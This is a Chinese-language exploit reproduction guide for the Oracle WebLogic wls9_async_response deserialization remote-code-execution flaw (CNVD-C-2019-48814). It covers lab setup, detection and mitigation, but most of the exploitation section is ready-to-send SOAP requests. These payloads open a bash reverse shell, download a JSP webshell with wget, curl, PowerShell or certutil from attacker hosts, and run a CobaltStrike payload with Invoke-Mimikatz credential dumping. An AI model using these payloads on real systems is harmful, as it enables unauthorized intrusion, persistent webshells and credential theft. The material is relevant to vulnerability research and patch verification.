CNVD-2019-48814 Weblogic wls9_async_response 反序列化RCE漏洞复现

 

0x00 事件背景

2019年4月17日，国家信息安全漏洞共享平台（CNVD）收录了由中国民生银行股份有限公司报送的Oracle WebLogic wls9-async反序列化远程命令执行漏洞（CNVD-C-2019-48814）。攻击者利用该漏洞，可在未授权的情况下远程执行命令。目前，官方补丁尚未发布，漏洞细节未公开。CNVD对该漏洞的综合评级为“高危”

0x01  漏洞情况分析

WebLogic Server是美国甲骨文（Oracle）公司开发的一款适用于云环境和传统环境的应用服务中间件，它提供了一个现代轻型开发平台，支持应用从开发到生产的整个生命周期管理，并简化了应用的部署和管理。

部分版本WebLogic中默认包含的wls9_async_response包，为WebLogic Server提供异步通讯服务。由于该WAR包在反序列化处理输入信息时存在缺陷，攻击者可以发送精心构造的恶意 HTTP 请求，获得目标服务器的权限，在未授权的情况下远程执行命令。

CNVD对该漏洞的综合评级为“高危”。

0x02 漏洞描述

近日，互联网爆出WebLogicwls9-async反序列化远程命令执行漏洞。攻击者利用该漏洞，可在未授权的情况下远程执行命令。该漏洞危害程度为高危(High)。目前，官方补丁尚未发布，漏洞细节未公开。

0x02  漏洞影响范围

  1.影响产品：

• Oracle WebLogic Server10.3.6.0.0
• Oracle WebLogic Server12.1.3.0.0
• Oracle WebLogic Server12.2.1.1.0
• Oracle WebLogic Server12.2.1.2.0

 2.影响组件：

• bea_wls9_async_response.war
• wsat.war

0x03  漏洞复现

一、liunx下的环境搭建

• 攻击机： Kali2019  
• 漏洞靶机：ubuntu16.04(docker  vulhub)    Weblogic10.3.6(wls1036_generic.jar)

1.在Ubuntu 16.04上安装docker和docker-compose：

(1).安装PIP
curl -s https://bootstrap.pypa.io/get-pip.py | python3
(2).安装docker
curl -s https://get.docker.com/ | sh

(3).启动docker服务

service docker start
(4).安装docker compose
pip install docker-compose

2.使用方法

(1).下载漏洞环境项目
git clone https://github.com/vulhub/vulhub.git

(2).进入到nexus利用环境

cd   vulhub/weblogic/CVE-2017-10271
(3).执行如下命令启动weblogic服务
docker-compose up  -d 

等待一段时间，访问http://your-ip:7001/即可看到一个404页面，说明weblogic已成功启动。

3.检测方法

用户可通过访问路径http://ip:port/_async/AsyncResponseService来判断该组件是否开启。若返回如下页面，则此组件开启。请及时采取防护措施

打开URL（http://IP:端口/_async/），提示错误403且含有“From RFC 2068 Hypertext Transfer Protocol -- HTTP/1.1:”­可判断存在Oracle Oracle WebLogic wls9-async反序列化远程命令执行漏洞。

http://149.248.54.82:7001/_async/

 

 

http://149.248.54.82:7001/_async/AsyncResponseService

 

 

二、linux下.漏洞利用
1.反弹shell利用：
(1).攻击机主机的IP地址如下，并用nc监听反弹端口

 

(2).通过burpsuit向weblogic服务发送攻击包，如下图所示

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 853
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

 

(3).可以看到成功反弹shell

 
2.上传webshell
(1).在kali攻击机上可搭建一个简单的web服务器，然后将webshll.txt放到其下

（2）使用以下poc进行发送攻击

poc1:

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://vpsip:vpsport/webshell.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

poc2:

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 789
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>curl http://vpsip:vpsport/webshell.txt -o servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

(3).访问webshell
http://149.248.54.82:7001/_async/test.jsp

 
 
 
 
三、winddows下的环境搭建

1.weblogic12.1.3.0.0安装
下载地址：https://www.oracle.com/technetwork/middleware/weblogic/downloads/index.html
开始安装：(需要java环境支持，记得配置JAVA环境变量)
任选下面其一的安装包，我这里选择的是12.1.3.0


 


2.打开cmd执行：
        
 C:\Program Files\Java\jdk1.8.0_152\bin\java   -jar    c:\fmw_12.1.3.0.0_wls.jar


用 C:\Program Files\Java\jdk1.8.0_121\bin\ 目录下的 java.exe 来执行weblogic12c的jar包（默认使用顺序，似乎首先用的是C:\Program Files\Java\jdk1.8.0_121\jre\bin\下的java.exe，所以会包jre不是有效的JDK），所以在cmd里要输入 C:\Program Files\Java\jdk1.8.0_152\bin\java   -jar    c:\fmw_12.1.3.0.0_wls.jar（这里之所以要用Progra~1 来代替Program Files是因为有 空格 会识别错误）

3.等待一会会弹出安装程序：
 

 











4.配置完成后，找到startWebLogic.cmd双击启动weblodgic

 

5.访问http://127.0.0.1:7001/console验证

 
 
四、windows下的漏洞利用：
1.打开地址http://ip:port/_async/AsyncResponseSevice查看是否存在漏洞
2.反弹shell，可直接使用CobaltStrike生成一个payload.ps1 powershell脚本，将该脚本放到公网上，然后使用以下poc进行发送：

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 861
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell "IEX (New-Object Net.WebClient).DownloadString('http://ip:port/payload.ps1'); Invoke-Mimikatz -DumpCreds"</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

可以看到成功在cobalstrike上反弹出目标系统的shell

3.上传webshell
(1).放置一个webshell.txt到公网主机上（这里是kali主机）
2.使用以下poc进行发送请求：
poc1:

POST /_async/AsyncResponseService HTTP/1.1
Host: ip:port
Content-Length: 854
Accept-Encoding: gzip, deflate
SOAPAction: 
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   
<soapenv:Header> 
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>powershell (new-object System.Net.WebClient).DownloadFile( 'http://ip:port/webshell.txt','servers/AdminServer/tmp/_WL_internal/bea_wls9_async_response/8tpkys/war/webshell.jsp')</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

poc2:

POST /_async/AsyncResponseService HTTP/1.1

Host: 172.16.191.51:7001

Content-Length: 870

Accept-Encoding: gzip, deflate

SOAPAction: 

Accept: */*

User-Agent: Apache-HttpClient/4.1.1 (java 1.5)

Connection: keep-alive

content-type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   

<soapenv:Header> 

<wsa:Action>xx</wsa:Action>

<wsa:RelatesTo>xx</wsa:RelatesTo>

<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

<void class="java.lang.ProcessBuilder">

<array class="java.lang.String" length="3">

<void index="0">

<string>cmd</string>

</void>

<void index="1">

<string>/c</string>

</void>

<void index="2">

<string>certutil -urlcache -split -f http://149.248.17.172:81/jshell.txt   servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp</string>

</void>

</array>

<void method="start"/></void>

</work:WorkContext>

</soapenv:Header>

<soapenv:Body>

<asy:onAsyncDelivery/>

</soapenv:Body></soapenv:Envelope>

(3).访问webshell

http://172.16.191.51:7001/bea_wls_internal/webshell.jsp

 

0x04  漏洞修复建议

目前，Oracle官方暂未发布补丁，临时解决方案如下：

1.删除该war包并重启webLogic；

2.通过访问策略控制禁止 /_async/* 路径的URL访问。

建议使用WebLogic Server构建网站的信息系统运营者进行自查，发现存在漏洞后，按照临时解决方案及时进行修复。

 

 

附录：

附录其他辅助工具：

https://github.com/backlion/nse_vuln/blob/master/weblogic/CNVD-C-2019-4814/weblogic-CNVD-C-2019-48814.nse

https://github.com/backlion/WebLogic_CNVD_C2019_48814

 

 
 

<wiz_tmp_tag id="wiz-table-range-border" contenteditable="false" style="display: none;">